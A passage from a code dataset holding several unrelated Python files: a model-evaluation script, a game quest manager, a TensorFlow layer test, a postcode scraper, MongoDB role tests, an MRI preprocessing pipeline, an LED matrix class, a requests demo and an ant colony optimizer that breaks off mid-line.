\"wordtype\": ori[-1]}\n if one_data[\"label\"] != one_data[\"predict\"]:\n print(f\"{one_data['text']}: 模型预测的结果与ground truth不一致\")\n predict_wrong_examples.append(one_data)\n else:\n correct_examples.append(one_data)\n print(f\"总样本数是{len(eval_data)},预测错误的样本总数是{len(predict_wrong_examples)}\")\n print(f\"总样本数是{len(eval_data)},预测正确的样本总数是{len(correct_examples)}\")\n\n df = pd.DataFrame(predict_wrong_examples)\n writer = pd.ExcelWriter(export_wrong_examples_excel, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='table1')\n writer.save()\n df = pd.DataFrame(correct_examples)\n writer = pd.ExcelWriter(correct_examples_excel, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='table1')\n writer.save()\n print(f\"保存全部为错误的样本到excel: {export_wrong_examples_excel}完成\")\n print(f\"保存全部为正确的样本到excel: {correct_examples_excel}完成\")\n print(f\"准确率为{(len(correct_examples)) / len(eval_data)}\")\n return eval_data, excel_data\n\ndef eval4dems():\n \"\"\"\n 评估4个维度的结果\n :return:\n :rtype:\n \"\"\"\n hostnames = [\"http://192.168.50.139:7081/api/\",\"http://192.168.50.139:7082/api/\",\"http://192.168.50.139:7083/api/\",\"http://192.168.50.139:7084/api/\"]\n dirs = [\"/opt/lavector/effect/\",\"/opt/lavector/pack/\", \"/opt/lavector/fragrance/\", \"/opt/lavector/promotion/\"]\n save_files = [\"effect_200_0629.json\", \"pack_200_0629.json\", \"fragrance_200_0629.json\", \"promotion_200_0629.json\"]\n names = [\"effect\", \"pack\", \"fragrance\", \"promotion\"]\n for host,dir,savefile,name in zip(hostnames, dirs, save_files, names):\n download_data_and_compare(hostname=[host], dirpath=dir,\n jsonfile=[savefile], isabsa=False, result_excel=f\"{name}_result.xlsx\", export_wrong_examples_excel=f\"{name}_wrong.xlsx\",correct_examples_excel=f\"{name}_correct.xlsx\",type=name)\n\nif __name__ == '__main__':\n # collect_data()\n # compare_model()\n # read_result_online()\n # download_data_and_compare()\n # download_data_and_compare(hostname=[\"http://192.168.50.139:8086/api/\"], dirpath=\"/opt/lavector/components/\", jsonfile= [\"192.168.50.139_500_8086_0129.json\"],isabsa=False)\n # download_data_and_compare(hostname=[\"http://192.168.50.139:8081/api/\"], dirpath=\"/opt/lavector/absa/\", jsonfile= [\"192.168.50.139_500_8081_0220.json\"],isabsa=True)\n # get_json_data_compare()\n # download_data_and_compare_same()\n # check_train_data()\n eval4dems()","sub_path":"huazhuang/utils/compare_components.py","file_name":"compare_components.py","file_ext":"py","file_size_in_byte":15350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"245830718","text":"# Embedded file name: lib.coginvasion.quests.QuestManagerAI\nimport QuestGlobals, Quests\nfrom QuestManagerBase import QuestManagerBase\nfrom lib.coginvasion.hood import ZoneUtil\nfrom lib.coginvasion.globals import CIGlobals\nimport random\n\nclass QuestManagerAI(QuestManagerBase):\n\n def __init__(self, avatar):\n QuestManagerBase.__init__(self)\n self.avatar = avatar\n\n def cleanup(self):\n QuestManagerBase.cleanup(self)\n del self.avatar\n\n def getPickableQuestList(self, npc):\n generator = random.Random()\n generator.seed(npc.doId)\n quests = []\n possibleQuestIds = list(Quests.Quests.keys())\n for questId in possibleQuestIds:\n if Quests.Quests[questId]['tier'] != self.avatar.getTier():\n possibleQuestIds.remove(questId)\n\n for questId in self.avatar.getQuestHistory():\n if questId in possibleQuestIds:\n possibleQuestIds.remove(questId)\n\n if len(possibleQuestIds) > 1:\n for questId in possibleQuestIds:\n if Quests.Quests[questId].get('lastQuestInTier', False) == True:\n possibleQuestIds.remove(questId)\n\n if len(possibleQuestIds) > 3:\n quests += generator.sample(possibleQuestIds, 3)\n else:\n quests = possibleQuestIds\n return quests\n\n def completedQuest(self, questId):\n quest = self.quests.get(questId)\n rewardValue = quest.rewardValue\n if quest.rewardType == Quests.RewardHealth:\n self.avatar.b_setMaxHealth(self.avatar.getMaxHealth() + rewardValue)\n self.avatar.b_setHealth(self.avatar.getMaxHealth())\n self.avatar.d_announceHealth(1, rewardValue)\n elif quest.rewardType == Quests.RewardJellybeans:\n self.avatar.b_setMoney(self.avatar.getMoney() + rewardValue)\n self.removeEntireQuest(questId)\n\n def isOnLastObjectiveOfQuest(self, questId):\n quest = self.quests.get(questId)\n return quest.currentObjectiveIndex >= quest.numObjectives - 1\n\n def wasLastObjectiveToVisit(self, npcId, checkCurrentCompleted = False):\n for quest in self.quests.values():\n questId = quest.questId\n currentObjectiveIndex = quest.currentObjectiveIndex\n currentObjective = quest.getCurrentObjective()\n lastObjectiveIndex = quest.currentObjectiveIndex - 1\n if lastObjectiveIndex < 0:\n continue\n lastObjectiveData = Quests.Quests[questId]['objectives'][lastObjectiveIndex]\n lastObjectiveType = lastObjectiveData[0]\n if lastObjectiveType == Quests.VisitNPC:\n if lastObjectiveData[2] == npcId:\n if not checkCurrentCompleted:\n return True\n if currentObjective.isComplete():\n return True\n elif lastObjectiveType == Quests.VisitHQOfficer:\n if CIGlobals.NPCToonDict[npcId][3] == CIGlobals.NPC_HQ:\n if not checkCurrentCompleted:\n return True\n if currentObjective.isComplete():\n return True\n\n return False\n\n def hasAnObjectiveToVisit(self, npcId, zoneId):\n for quest in self.quests.values():\n currObjective = quest.getCurrentObjective()\n if currObjective.type == Quests.VisitNPC:\n if currObjective.npcId == npcId:\n if currObjective.npcZone == zoneId:\n return True\n elif currObjective.type == Quests.VisitHQOfficer:\n if CIGlobals.NPCToonDict[npcId][3] == CIGlobals.NPC_HQ:\n return True\n\n return False\n\n def checkIfObjectiveIsComplete(self, questId):\n quest = self.quests.get(questId)\n if quest.currentObjective.isComplete():\n self.incrementQuestObjective(questId)\n\n def cogDefeated(self, cog):\n for questId in self.quests.keys():\n quest = self.quests[questId]\n objective = quest.getCurrentObjective()\n if objective.type in Quests.DefeatCogObjectives:\n if not objective.isComplete():\n if objective.type == Quests.DefeatCog:\n if objective.subject == Quests.Any:\n if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n self.incrementQuestObjectiveProgress(questId)\n elif objective.subject == cog.head:\n if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n self.incrementQuestObjectiveProgress(questId)\n elif objective.type == Quests.DefeatCogLevel:\n if cog.getLevel() >= objective.minCogLevel:\n if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n self.incrementQuestObjectiveProgress(questId)\n elif objective.type == Quests.DefeatCogDept:\n if objective.subject == cog.team:\n if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n self.incrementQuestObjectiveProgress(questId)\n self.checkIfObjectiveIsComplete(questId)\n\n def invasionDefeated(self, hood, size = None):\n for questId in self.quests.keys():\n quest = self.quests[questId]\n objective = quest.getCurrentObjective()\n if objective.type == Quests.DefeatCogInvasion:\n if not objective.isComplete():\n if ZoneUtil.getHoodId(objective.area, 1) == hood or objective.area == Quests.Any:\n self.incrementQuestObjectiveProgress(questId)\n self.checkIfObjectiveIsComplete(questId)\n\n def tournamentDefeated(self, hood):\n for questId in self.quests.keys():\n quest = self.quests[questId]\n objective = quest.getCurrentObjective()\n if objective.type == Quests.DefeatCogTournament:\n if not objective.isComplete():\n if ZoneUtil.getHoodId(objective.area, 1) == hood or objective.area == Quests.Any:\n self.incrementQuestObjectiveProgress(questId)\n self.checkIfObjectiveIsComplete(questId)\n\n def makeQuestsFromData(self):\n QuestManagerBase.makeQuestsFromData(self, self.avatar)\n\n def addNewQuest(self, questId):\n questHistory = list(self.avatar.getQuestHistory())\n questData = list(self.avatar.getQuests())\n questData[0].append(questId)\n questData[1].append(0)\n questData[2].append(0)\n questHistory.append(questId)\n self.avatar.b_setQuests(questData)\n self.avatar.b_setQuestHistory(questHistory)\n\n def removeEntireQuest(self, questId):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n for array in questData:\n del array[quest.index]\n\n self.avatar.b_setQuests(questData)\n\n def incrementQuestObjective(self, questId, increment = 1):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[1][quest.index] += increment\n questData[2][quest.index] = 0\n self.avatar.b_setQuests(questData)\n\n def updateQuestObjective(self, questId, value):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[1][quest.index] = value\n self.avatar.b_setQuests(questData)\n\n def incrementQuestObjectiveProgress(self, questId, increment = 1):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[2][quest.index] += increment\n self.avatar.b_setQuests(questData)\n\n def updateQuestObjectiveProgress(self, questId, value):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[2][quest.index] = value\n self.avatar.b_setQuests(questData)","sub_path":"lib/coginvasion/quests/QuestManagerAI.py","file_name":"QuestManagerAI.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161814740","text":"# Copyright (C) 2018-2023 Intel Corporation\n# SPDX-License-Identifier: Apache-2.0\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\nfrom common.tf_layer_test_class import CommonTFLayerTest\n\n\nclass TestLog1p(CommonTFLayerTest):\n def _prepare_input(self, inputs_info):\n assert 'x' in inputs_info\n x_shape = inputs_info['x']\n inputs_data = {}\n inputs_data['x'] = np.random.randint(-0.9, 5, x_shape).astype(np.float32)\n\n return inputs_data\n\n def create_log1p_net(self, x_shape):\n tf.compat.v1.reset_default_graph()\n # Create the graph and model\n with tf.compat.v1.Session() as sess:\n x = tf.compat.v1.placeholder(tf.float32, x_shape, 'x')\n tf.raw_ops.Log1p(x=x)\n tf.compat.v1.global_variables_initializer()\n tf_net = sess.graph_def\n\n return tf_net, None\n\n test_data_basic = [\n dict(x_shape=[]),\n dict(x_shape=[3]),\n dict(x_shape=[2, 1, 4]),\n ]\n\n @pytest.mark.parametrize(\"params\", test_data_basic)\n @pytest.mark.precommit_tf_fe\n @pytest.mark.nightly\n def test_log1p_basic(self, params, ie_device, precision, ir_version, temp_dir,\n use_new_frontend, use_old_api):\n self._test(*self.create_log1p_net(**params),\n ie_device, precision, ir_version, temp_dir=temp_dir,\n use_new_frontend=use_new_frontend, use_old_api=use_old_api)\n","sub_path":"tests/layer_tests/tensorflow_tests/test_tf_Log1p.py","file_name":"test_tf_Log1p.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70714517","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2015 Agustin Prats\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport logging\nimport re\n\nfrom bs4 import BeautifulSoup\n\nfrom http import HttpCache\n\n\nclass PostcodeScraper(object):\n\n def __init__(self, http_cache=HttpCache(), base_url='http://distritopostal.es'):\n self.base_url = base_url\n self.http_cache = http_cache\n\n def get_postcodes(self, province, city):\n results = []\n if self._validate(province, city):\n url = self.base_url + '/' + self._clean(province) + '/' + self._clean(city)\n html = self.http_cache.get(url)\n if html:\n soup = BeautifulSoup(html.encode('latin-1'), 'html.parser')\n\n # one postcode\n one_postcode_soup = soup.find('td', class_='cp center')\n if one_postcode_soup:\n results.append(one_postcode_soup.text)\n\n # multiple postcodes\n multiple_postcode_soup = soup.find_all('a', title=re.compile('C.digo postal \\d{5},.*'))\n if multiple_postcode_soup:\n for postcode_soup in multiple_postcode_soup:\n results.append(postcode_soup.text)\n\n return results\n\n @staticmethod\n def _validate(province, city):\n result = True\n if province is None:\n logging.error('Province parameter not specified')\n result = False\n if city is None:\n logging.error('City parameter not specified')\n result = False\n return result\n\n @staticmethod\n def _clean(parameter):\n return parameter.lower().strip().replace(' ', '-')","sub_path":"edenred_ranking/scrapers/postcode.py","file_name":"postcode.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468727577","text":"import os\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']\n).get_hosts('all')\n\n\ndef include_vars(host):\n if host.system_info.distribution == \"redhat\" \\\n or host.system_info.distribution == \"centos\":\n ansible = host.ansible('include_vars',\n 'file=\"../../vars/RedHat.yml\"',\n False,\n False)\n if host.system_info.distribution == \"debian\" \\\n or host.system_info.distribution == \"ubuntu\":\n ansible = host.ansible('include_vars',\n 'file=\"../../vars/Debian.yml\"',\n False,\n False)\n return ansible\n\n\ndef test_mongod_cnf_file(host):\n mongodb_user = include_vars(host)['ansible_facts']['mongodb_user']\n mongodb_group = include_vars(host)['ansible_facts']['mongodb_group']\n f = host.file('/etc/mongod.conf')\n\n assert f.exists\n assert f.user == mongodb_user\n assert f.group == mongodb_group\n\n\ndef test_mongod_service(host):\n mongod_service = include_vars(host)['ansible_facts']['mongod_service']\n s = host.service(mongod_service)\n\n assert s.is_running\n assert s.is_enabled\n\n\ndef test_mongod_port(host):\n try:\n port = include_vars(host)['ansible_facts']['mongod_port']\n except KeyError:\n port = 27017\n s = host.socket(\"tcp://0.0.0.0:{0}\".format(port))\n\n assert s.is_listening\n\n\ndef test_mongod_replicaset(host):\n '''\n Ensure that the MongoDB replicaset has been created successfully\n '''\n try:\n port = include_vars(host)['ansible_facts']['mongod_port']\n except KeyError:\n port = 27017\n cmd = \"mongo --port {0} --eval 'rs.status()'\".format(port)\n # We only want to run this once\n if host.ansible.get_variables()['inventory_hostname'] == \"ubuntu_16\":\n r = host.run(cmd)\n\n assert \"rs0\" in r.stdout\n assert \"ubuntu-16:{0}\".format(port) in r.stdout\n assert \"ubuntu-18:{0}\".format(port) in r.stdout\n assert \"debian-stretch:{0}\".format(port) in r.stdout\n assert \"debian-buster:{0}\".format(port) in r.stdout\n assert \"centos-7:{0}\".format(port) in r.stdout\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/mongodb/roles/mongodb_mongod/molecule/virtualbox/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496294652","text":"#!/usr/bin/env python3\nimport csv\nimport os\nMAIL_LIST = 'maillist'\nfor file in os.listdir(path=MAIL_LIST):\n with open(MAIL_LIST+'/'+file, 'r', encoding='utf8')as csvfile:\n rows = csv.reader(csvfile)\n for row in rows:\n org = row[3]\n name = row[2]\n if row[1]:\n mailto = row[1]\n else:\n mailto = row[0]\n print(mailto+','+name)\n","sub_path":"mailpre.py","file_name":"mailpre.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"103993604","text":"import subprocess\nimport os\nfrom time import localtime, strftime\nimport numpy as np\nimport shutil\nimport sys\n\ndef curr_time(format='logging'):\n if format == 'filename':\n return strftime(\"%y%m%d-%H%M%S\", localtime())\n elif format == 'logging':\n return strftime(\"%Y/%m/%d @ %H:%M:%S\", localtime())\n\n# load the directory of T1w raw images\nroot_dir = '/scr4/marco/workspace/data/BioMS/images/mri_raw/T1w/'\nref = '/usr/share/fsl/data/standard/MNI152_T1_1mm.nii.gz'\nfiles = np.sort(os.listdir(root_dir+'raw'))\nwith open('/scr4/marco/workspace/data/BioMS/logs/fsl_pipe-'+curr_time('filename')+'.log','w') as f:\n\tsys.stdout = f\n\tprint('FSL Pipeline Started @ ' + curr_time('logging'))\n\ttry:\n\t\tfor file in files:\n\t\t\tsubject, ext = os.path.splitext(os.path.splitext(file)[0])\n\t\t\tprint('Processing Subject: ' + subject)\n\t\t\tfor step in range(0,5):\n\t\t\t\tif step == 0:\n\t\t\t\t\tprint('... Reorienting to MNI')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"fslreorient2std\",root_dir+'raw/'+file,root_dir+'processed/'+subject+'_'+str(step)+'-reoriented.nii.gz')\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\n\t\t\t\telif step == 1:\n\t\t\t\t\tprint('... Standard Space ROI Prebet')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"standard_space_roi\",root_dir+'processed/'+subject+'_'+str(step-1)+'-reoriented.nii.gz',root_dir+'processed/'+subject+'_'+str(step)+'-ssrb.nii.gz','-b')\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\n\t\t\t\telif step == 2:\n\t\t\t\t\tprint('... Extracting Brain')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"bet\",root_dir+'processed/'+subject+'_'+str(step-1)+'-ssrb.nii.gz',root_dir+'processed/'+subject+'_'+str(step)+'-bet.nii.gz','-f','0.1')\n\t\t\t\t\tprint(args)\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\t\t\t\n\t\t\t\telif step == 3:\n\t\t\t\t\tprint('... FLIRT')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"flirt\",'-in',root_dir+'processed/'+subject+'_'+str(step-1)+'-bet.nii.gz','-ref',ref,'-out',root_dir+'processed/'+subject+'_'+str(step)+'-flirt.nii.gz')\n\t\t\t\t\tprint(args)\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\t\t\n\t\t\t\telif step == 4:\n\t\t\t\t\tprint('... FAST')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"fast\",'-g',root_dir+'processed/'+subject+'_'+str(step-1)+'-flirt.nii.gz')\n\t\t\t\t\tprint(args)\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\t\t\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\texcept Exception as e:\n\t\tprint(e)\n\n\n\n\n\n\n","sub_path":"scripts/fsl_pipe.py","file_name":"fsl_pipe.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623843138","text":"#class to represent LED light matrices (where each LED takes an RGB value)\n#m is number of rows (=height)\n#n is number of columns (=length)\nclass Matrix(object):\n\n #constructor that instantiates an (MxN) 0-matrix (optional param to include matrix indices to set)\n def __init__(self, m, n, data=None):\n \n #check for valid data\n if (not type(m) is int or not type(n) is int or m <= 0 or n <= 0):\n raise MatrixError(\"Invalid dimension(s)\")\n\n self.rows = [[(0,0,0)]*n for x in range(m)]\n self.m = m\n self.n = n\n\n if (data):\n self.setdata(data)\n\n #get value of matrix[row][col]\n def getdatum(self, m, n):\n \n #check for valid data\n if (not type(m) is int or not type(n) is int or m < 0 or n < 0 or m > self.m-1 or n > self.n-1):\n raise MatrixError(\"Invalid matrix index\")\n \n return self.rows[m][n]\n\n #get matrix representing the given column of self\n def getcolumn(self, n):\n\n #check for valid data\n if (not type(n) is int or n < 0 or n > self.n-1):\n raise MatrixError(\"Invalid column index\")\n\n output = Matrix(self.m, 1)\n for m in range(self.m):\n output.setdatum(m, 0, self.rows[m][n])\n\n return output\n\n #get matrix representing the given row of self\n def getrow(self, m):\n\n #check for valid data\n if (not type(m) is int or m < 0 or m > self.m-1):\n raise MatrixError(\"Invalid row index\")\n\n output = Matrix(1, self.n)\n for n in range(self.n):\n output.setdatum(0, n, self.rows[m][n])\n\n return output\n\n #return submatrix of self given row and column indices\n #submatrix is computed from top left\n def get_submatrix(self, m, n):\n\n #check inputs\n if (not type(m) is int or m < 0 or not type(n) is int or n < 0):\n raise MatrixError(\"Invalid matrix index\")\n\n row_bound = self.m if (m >= self.m) else m\n col_bound = self.n if (n >= self.n) else n\n\n output = Matrix(row_bound, col_bound)\n for x in range(row_bound):\n for y in range(col_bound):\n output.setdatum(x, y, self.rows[x][y])\n return output\n\n #check whether self is all 0's\n def is_empty(self):\n for m in range(self.m):\n for n in range(self.n):\n if (self.rows[m][n] != (0,0,0)):\n return False\n return True\n\n #copy_constructor\n def copy_construct(self):\n\n output = Matrix(self.m, self.n)\n for m in range(self.m):\n for n in range(self.n):\n output.setdatum(m, n, self.rows[m][n])\n return output\n\n #set the value of matrix[row][col]\n def setdatum(self, m, n, data):\n \n #check for valid data\n if (not type(m) is int or not type(n) is int or m < 0 or n < 0 or m > self.m-1 or n > self.n-1):\n raise MatrixError(\"Invalid matrix index\")\n if (not type(data) is tuple or not len(data) >= 3 or not (data[0] >= 0 and data[0] <= 255) or not (data[1] >= 0 and data[1] <= 255) or not (data[2] >= 0 and data[2] <= 255)):\n raise MatrixError(\"Invalid input data\")\n \n self.rows[m][n] = data\n return True\n\n #method to set multiple indices in the matrix at once\n #input format: a list of 3-element tuples (m, n, data)\n def setdata(self, data):\n\n #check for valid data\n if (not type(data) is list):\n raise MatrixError(\"Input must be a list\")\n\n for point in data:\n if (not type(point) is tuple or len(point) < 3):\n raise MatrixError(\"Invalid matrix index data\")\n self.setdatum(point[0], point[1], point[2])\n\n #copy input matrix into self\n def copy(self, matrix):\n \n #check for valid data\n if (not type(matrix) is Matrix):\n raise MatrixError(\"Copy input must be a matrix\")\n\n self.rows = []\n self.rows = [[(0,0,0)]*matrix.n for x in range(matrix.m)]\n\n row_count = 0\n col_count = 0\n for m in range(matrix.m):\n for n in range(matrix.n):\n self.rows[m][n] = matrix.rows[m][n]\n\n self.m = matrix.m\n self.n = matrix.n\n\n #concatenate input matrix onto self\n def concatenate(self, matrix):\n\n #validate inputs\n if ((not type(matrix) is Matrix) or (not matrix.m == self.m)):\n raise MatrixError(\"Invalid input matrix. Matrices must have same height\")\n\n output = Matrix(self.m, self.n+matrix.n)\n col_count = 0\n for n in range(self.n):\n for m in range(self.m):\n output.rows[m][n] = self.rows[m][n]\n col_count += 1\n for n in range(matrix.n):\n for m in range(matrix.m):\n output.rows[m][col_count+n] = matrix.rows[m][n]\n\n return output\n\n #stack self on top of input matrix\n def stack_matrix(self, matrix):\n\n #validate inputs\n if ((not type(matrix) is Matrix) or (not matrix.n == self.n)):\n raise MatrixError(\"Invalid input matrix. Matrices must have same number of columns\")\n\n output = Matrix(self.m+matrix.m, self.n)\n row_count = 0\n for m in range(self.m):\n for n in range(self.n):\n output.rows[m][n] = self.rows[m][n]\n row_count += 1\n for m in range(matrix.m):\n for n in range(matrix.n):\n output.rows[row_count+m][n] = matrix.rows[m][n]\n\n return output\n\n #replace left/rightmost n columns with input\n def shift_horizontal(self, left, new_col):\n\n #validate inputs\n if (not type(left) is bool or not type(new_col) is Matrix or (not self.m == new_col.m)):\n raise MatrixError(\"Invalid inputs. Matrices must have the same height\")\n\n shift_factor = self.n - new_col.n\n if (shift_factor <= 0):\n #replace the old matrix entirely\n self.copy(new_col)\n return\n else:\n #shift columns to the left\n if (left):\n output = Matrix(self.m, shift_factor)\n for m in range(self.m):\n for n in range(new_col.n,self.n):\n output.setdatum(m, n-new_col.n, self.rows[m][n])\n self.copy(output.concatenate(new_col))\n #shift columns to the right\n else:\n output = Matrix(new_col.m, new_col.n)\n output.copy(new_col)\n temp = Matrix(self.m, shift_factor)\n for m in range(self.m):\n for n in range(shift_factor):\n temp.setdatum(m, n, self.rows[m][n])\n self.copy(output.concatenate(temp))\n\n #replace top/bottom n rows with input\n def shift_vertical(self, bottom, new_rows):\n\n #validate inputs\n if (not type(bottom) is bool or not type(new_rows) is Matrix or (not self.n == new_rows.n)):\n raise MatrixError(\"Invalid inputs. Matrices must have the same number of columns\")\n\n shift_factor = self.m - new_rows.m\n if (shift_factor <= 0):\n #replace the old matrix entirely\n self.copy(new_rows)\n return\n else:\n #shift columns up\n if (bottom):\n output = Matrix(shift_factor, self.n)\n for n in range(self.n):\n for m in range(new_rows.m,self.n):\n output.setdatum(m-new_rows.m, n, self.rows[m][n])\n self.copy(output.stack_matrix(new_rows))\n #shift columns down\n else:\n output = Matrix(new_rows.m, new_rows.n)\n output.copy(new_rows)\n temp = Matrix(shift_factor, self.n)\n for n in range(self.n):\n for m in range(shift_factor):\n temp.setdatum(m, n, self.rows[m][n])\n self.copy(output.stack_matrix(temp))\n\n #logical functions - WHAT TO PUT HERE????\n\n #print the matrix to console\n def print_matrix(self):\n for m in range(self.m):\n row = \"\"\n for n in range(self.n):\n row += \"(\"\n row += str(self.rows[m][n][0])\n row += \",\"\n row += str(self.rows[m][n][1])\n row += \",\"\n row += str(self.rows[m][n][2])\n row += \")\"\n print (row)\n\n #function to test display\n def test_display(self):\n for m in range(self.m):\n row = \"\"\n for n in range(self.n):\n if (self.rows[m][n][0] == 255):\n row += \".\"\n print (row)\n \n \n#error class\nclass MatrixError(Exception):\n def __init__(self, message):\n Exception.__init__(self, message)\n\n \n","sub_path":"MatrixRGB.py","file_name":"MatrixRGB.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"236316155","text":"import requests\n# Base URL being accessed\nurl = 'http://httpbin.org/post'\n\n# Dictionary of query parameters (if any)\nparms = {\n 'name1' : 'value1',\n 'name2' : 'value2'\n}\n\n# Extra headers\nheaders = {\n 'User-agent' : 'none/ofyourbusiness',\n 'Spam' : 'Eggs'\n}\nresp = requests.post(url, data=parms, headers=headers)\n\n# Decoded text returned by the request\ntext = resp.text\nprint(text)\n\nimport requests\nurl = 'http://httpbin.org/post'\nfiles = {'file': ('data.csv', open('data.csv', 'rb'))}\nr = requests.post(url, files=files)","sub_path":"base/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238725994","text":"import pandas as pd\nimport numpy as np\nfrom random import randint\n\n#code init\niterations = 1000\nants = 13\n\n#datastructure\ngraph = []\nph = []\nnum_node = 0\nnodes = []\n\n#param\nalpha=0.5\nbeta=0.5\ndens=0.25\n\ndef read_data():\n\tglobal graph\n\tglobal ph\n\tglobal num_node\n\tglobal nodes\n\n\t#reading time matrix from csv file\n\tdt = pd.read_csv('ip2.csv')\n\tgraph = dt.to_numpy()\n\tnum_node = len(graph)\n\ttemp = []\n\n\t#initiallization of \n\tfor i in range(num_node):\n\t\tph.append([1 for i in range(num_node)])\n\n\t#initiallization of all nodes\n\tnodes = [ i for i in range(num_node) ]\n\ndef start_ant(nvis,dpot):\n\tglobal graph\n\tglobal ph\n\tglobal num_node\n\tglobal nodes\n\n\t# init, cp(current position) is dpot.\n\tcp=dpot\n\tpath = []\n\tpath.append(cp)\n\t# This loop makes ant to visit each&every vertex. By the time visiting the vertex, it will remove the vertex from nvis(not visited list).\n\twhile len(nvis)!=0:\n\t\t#count the probabilities of non visited vertex.\n\t\tprobabilities = list(map(lambda x: ( ( ( (ph[cp][x])**alpha)*((1/graph[cp][x])**beta)) ) , nvis))\n\t\tprobabilities = probabilities/np.sum(probabilities) \n\n\t\t# counting next vertex in the bases of heigest probability.\n\t\tcp=nvis[0]\n\t\tmm=probabilities[0]\n\t\tfor i in range(len(probabilities)):\n\t\t\tif probabilities[i] >mm:\n\t\t\t\tmm=probabilities[i]\n\t\t\t\tcp=nvis[i]\n\t\t# appending next vertex in path and removing from the list of non visited vertex.\n\t\tpath.append(cp)\n\t\tnvis.remove(cp)\n\t#returning the path of individual ant.\n\treturn path\n\ndef update_feromone(dpot,best_solution,shortest_dist):\n\t# for all the edge, decresing the level of feromone.\n\tfor i in range(num_node):\n\t\tfor j in range(num_node):\n\t\t\tph[i][j] -= (1-dens)*ph[i][j]\n\t\t\t# if the feromone level become 0 then it will not appropriate for the probability count.\n\t\t\t# So, I've taken 0.0000000001 insted of 0. \n\t\t\tif ph[i][j]<=0:\n\t\t\t\tph[i][j]=(10**(-10))\n\n\t# cp is current position\n\t# starting from dpot which is 0 by default.\n\tcp = dpot\n\n\t#end of the path is also dpot(0). so, i'm appending mnly.\n\tbest_solution[1].append(dpot)\n\t#path = [1,2,3,4,0]\n\t# 0-1\n\t# 1-2\n\t# 2-3\n\t# 3-4\n\t# 4-0\n\n\t# taking each edges in best path and updating feromone level.\n\tfor x in best_solution[1]:\n\t\tif cp != x:\n\t\t\t#Q=1,l=graph[cp][x]\n\t\t\tph[cp][x] += 1/graph[cp][x] + (ants/6)*(1/shortest_dist[0])\n\t\t\tph[x][cp] = ph[cp][x]\n\t\t\tcp=x\n\ndef getWeight(path,dpot):\n\t# this function counts the summation of the path.\n\tx=dpot\n\tweight = 0\n\tfor y in 